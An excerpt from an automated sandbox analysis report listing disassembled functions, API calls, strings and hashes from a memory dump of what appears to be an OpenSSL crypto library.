Opcode Fuzzy Hash: 1875cd00db0b90e4c0d86032d87d42243ef611fcc8a6360c4d15416524a2f1a6
Instruction Fuzzy Hash: 6051E466B0A74F96EA0C9B29B4241B93391BF54B84F449031EF0E03792EE3CE446A741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE23D3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FFD3FCEDC88
GetProcAddress.KERNEL32 ref: 00007FFD3FCEDC9D
GetProcessWindowStation.USER32 ref: 00007FFD3FCEDCC7
GetUserObjectInformationW.USER32 ref: 00007FFD3FCEDCEF
GetLastError.KERNEL32 ref: 00007FFD3FCEDCFD
GetUserObjectInformationW.USER32 ref: 00007FFD3FCEDD68
wcsstr.VCRUNTIME140 ref: 00007FFD3FCEDD90

Strings

Service-0x, xrefs: 00007FFD3FCEDD89
_OPENSSL_isservice, xrefs: 00007FFD3FCEDC93

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindowwcsstr
String ID: Service-0x$_OPENSSL_isservice
API String ID: 459917433-1672312481
Opcode ID: 99dd96cfbefb6a8d05671be5233498e0afd2850c6e90bdb4439f43dff31dda30
Instruction ID: 01c9c36949e77aa9f716892d07f4d79c4813134346b0c3654af7555b9abbcb65
Opcode Fuzzy Hash: 99dd96cfbefb6a8d05671be5233498e0afd2850c6e90bdb4439f43dff31dda30
Instruction Fuzzy Hash: 35416221B45B8A56EB589F34E8A026C2390FF547B4B485734EB7D467E4DF2CE544A310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE4B3D Relevance: 15.1, APIs: 3, Strings: 7, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FE135FD
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FE13660
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FE1368F

Strings

DER:, xrefs: 00007FFD3FE13656
critical,, xrefs: 00007FFD3FE135F6
..\s\crypto\x509v3\v3_conf.c, xrefs: 00007FFD3FE13720
ASN1:, xrefs: 00007FFD3FE13685
/, xrefs: 00007FFD3FE13718
name=, xrefs: 00007FFD3FE13742
, value=, xrefs: 00007FFD3FE13733

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strncmp
String ID: , value=$..\s\crypto\x509v3\v3_conf.c$/$ASN1:$DER:$critical,$name=
API String ID: 1114863663-1429737502
Opcode ID: 63a2bdf598e046781e79bdca1e8e452f79dda2babad14bbaf23e734bb40bd00f
Instruction ID: bf517dc88a9efbda046aaf0d69819a9f9843283b73b04ce18f0bbb89e3b6ef2d
Opcode Fuzzy Hash: 63a2bdf598e046781e79bdca1e8e452f79dda2babad14bbaf23e734bb40bd00f
Instruction Fuzzy Hash: 1B410E62B0868A46FB189F22E82077A7B91BF95BD4F484130DF5D27785EE3DE504E701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE41D8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFD3FCAA7AE
WSAGetLastError.WS2_32 ref: 00007FFD3FCAA7B8

Strings

o, xrefs: 00007FFD3FCAA8DF
..\s\crypto\bio\b_sock2.c, xrefs: 00007FFD3FCAA73E, 00007FFD3FCAA7CE, 00007FFD3FCAA7EA, 00007FFD3FCAA853, 00007FFD3FCAA86F, 00007FFD3FCAA8CB, 00007FFD3FCAA8E7

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: ..\s\crypto\bio\b_sock2.c$o
API String ID: 1729277954-1872632005
Opcode ID: 0f88e614ad80d80276f5bfde924b9d136a1d8b3fe912a0182a12cb3aed0b8be6
Instruction ID: 8af275eac809b1609f98ac99f3518542cdcccc83a05cdf351a794ba603581a55
Opcode Fuzzy Hash: 0f88e614ad80d80276f5bfde924b9d136a1d8b3fe912a0182a12cb3aed0b8be6
Instruction Fuzzy Hash: 2B51E276B0858A86E728CF11F8646BE7361FB84744F440235EB5843A89CF3DE549EB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE3779 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 85stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC89E61
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFD3FC89E7C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC89F26

Strings

utf8only, xrefs: 00007FFD3FC89F1C
nombstr, xrefs: 00007FFD3FC89E9F
pkix, xrefs: 00007FFD3FC89EDF
MASK:, xrefs: 00007FFD3FC89E5A
default, xrefs: 00007FFD3FC89F4A

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strcmpstrncmpstrtoul
String ID: MASK:$default$nombstr$pkix$utf8only
API String ID: 1175158921-3483942737
Opcode ID: baecd749d92ef97b8e8199dea3836fa393c467047f516c379157f803b34e24fb
Instruction ID: 3e8dfbe3a8c5ed2253644b5e65896f78c57a35609a78bf1ee7dea1aa85263181
Opcode Fuzzy Hash: baecd749d92ef97b8e8199dea3836fa393c467047f516c379157f803b34e24fb
Instruction Fuzzy Hash: F8312862F1C58982EB598B18F4E03BD7B61FB85B40F444632EB5E43A95EF2CE495D700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE60D2 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

SwitchToFiber.KERNEL32 ref: 00007FFD3FCA3834
CreateFiber.KERNEL32 ref: 00007FFD3FCA38AC
memmove.VCRUNTIME140 ref: 00007FFD3FCA3905
SwitchToFiber.KERNEL32 ref: 00007FFD3FCA3928
DeleteFiber.KERNEL32 ref: 00007FFD3FCA3A0B

Strings

*, xrefs: 00007FFD3FCA376F
..\s\crypto\async\async.c, xrefs: 00007FFD3FCA3751, 00007FFD3FCA3768, 00007FFD3FCA37B0, 00007FFD3FCA38D9, 00007FFD3FCA3940, 00007FFD3FCA39C0, 00007FFD3FCA39F6, 00007FFD3FCA3A17, 00007FFD3FCA3A44

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: Fiber$Switch$CreateDeletememmove
String ID: *$..\s\crypto\async\async.c
API String ID: 81049052-1471988776
Opcode ID: a25fea029b78e2fd19c0bfb87eddc36392399c99122287fdb6b6d3d79c401250
Instruction ID: 9299e31b843539f9a3dd9740268b5bad6ef21aff2a2826c84716586c09decb3b
Opcode Fuzzy Hash: a25fea029b78e2fd19c0bfb87eddc36392399c99122287fdb6b6d3d79c401250
Instruction Fuzzy Hash: 6BA16872B09A4A85EB68DF25F4B02AD63A0EB54B84F444032DF8D477A1EF3EE545E301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FDE21C0 Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 190stringCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,00000000,00007FFD3FDE10D2), ref: 00007FFD3FDE2204
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FDE2369

Strings

, status text: , xrefs: 00007FFD3FDE247C
unspecified, xrefs: 00007FFD3FDE2465
..\s\crypto\ts\ts_rsp_verify.c, xrefs: 00007FFD3FDE22AD, 00007FFD3FDE22C7, 00007FFD3FDE2445, 00007FFD3FDE24A2
unknown code, xrefs: 00007FFD3FDE222D
, failure codes: , xrefs: 00007FFD3FDE246C
status code: , xrefs: 00007FFD3FDE2490

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: memsetstrncpy
String ID: , failure codes: $, status text: $..\s\crypto\ts\ts_rsp_verify.c$status code: $unknown code$unspecified
API String ID: 388311670-2553778726
Opcode ID: 54b9e32707e9da6ab1e04de0869fe44cc820a53a7be1314d57f751966fd90d3a
Instruction ID: ef5f5bff0c51cc62bf5171f0d3afb2dfd126ef922a3ff8d0ac4807dbac08ce2e
Opcode Fuzzy Hash: 54b9e32707e9da6ab1e04de0869fe44cc820a53a7be1314d57f751966fd90d3a
Instruction Fuzzy Hash: C781B172F0C68A85EB28EB11B8643B963A1FBA5B84F880135DB4D43795DF3EE405A741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE54C5 Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 121stringCOMMON

Download Yara Rule

APIs

strchr.VCRUNTIME140 ref: 00007FFD3FDE6A7A
strchr.VCRUNTIME140 ref: 00007FFD3FDE6A8B
memmove.VCRUNTIME140 ref: 00007FFD3FDE6BAD

Strings

..\s\crypto\ui\ui_lib.c, xrefs: 00007FFD3FDE6B14, 00007FFD3FDE6B8D
to , xrefs: 00007FFD3FDE6B39
You must type in , xrefs: 00007FFD3FDE6B4F
characters, xrefs: 00007FFD3FDE6B28

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strchr$memmove
String ID: characters$ to $..\s\crypto\ui\ui_lib.c$You must type in
API String ID: 1080442166-3422546668
Opcode ID: 86ffed5a8e159f5a57d47c60d640ab80ac40658c8a89624c649fd343aea4f7b3
Instruction ID: 21eab4b9e8dec0c91e0d65d22e4229513ac9a43a0ee3c42a44f69a2b0c232ef4
Opcode Fuzzy Hash: 86ffed5a8e159f5a57d47c60d640ab80ac40658c8a89624c649fd343aea4f7b3
Instruction Fuzzy Hash: 07510562B1864A86EB28CF24E46467C3760FBA4B48F084232DB4C077D5DF3DE604E781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE3CFC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 114stringCOMMON

Download Yara Rule

APIs

strchr.VCRUNTIME140 ref: 00007FFD3FDD8149
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FDD8164
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FDD817D

Strings

file, xrefs: 00007FFD3FDD8111, 00007FFD3FDD8156
..\s\crypto\store\store_lib.c, xrefs: 00007FFD3FDD81DB, 00007FFD3FDD81F3
T, xrefs: 00007FFD3FDD81FA

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: _stricmpstrchrstrncmp
String ID: ..\s\crypto\store\store_lib.c$T$file
API String ID: 3017659097-909561481
Opcode ID: 39915f56e0ddc46c0cb44c36ae9ccb2b802c5d23dbfdd91a05749117255e1e5e
Instruction ID: 13e4495c36371d97eb0f7f39fb116522f8b82ab91662b54c49216391135b21d4
Opcode Fuzzy Hash: 39915f56e0ddc46c0cb44c36ae9ccb2b802c5d23dbfdd91a05749117255e1e5e
Instruction Fuzzy Hash: E441EF72B09B4A96EA1AAF11E8605A977A4FF98BC4F444030EF4C07765EF3CE509E701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE2E46 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FFD3FCEDA72

Strings

~, xrefs: 00007FFD3FCEDB24
OPENSSL_ia32cap, xrefs: 00007FFD3FCEDA48
~, xrefs: 00007FFD3FCEDAA7
~, xrefs: 00007FFD3FCEDB3C
~, xrefs: 00007FFD3FCEDA8C

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
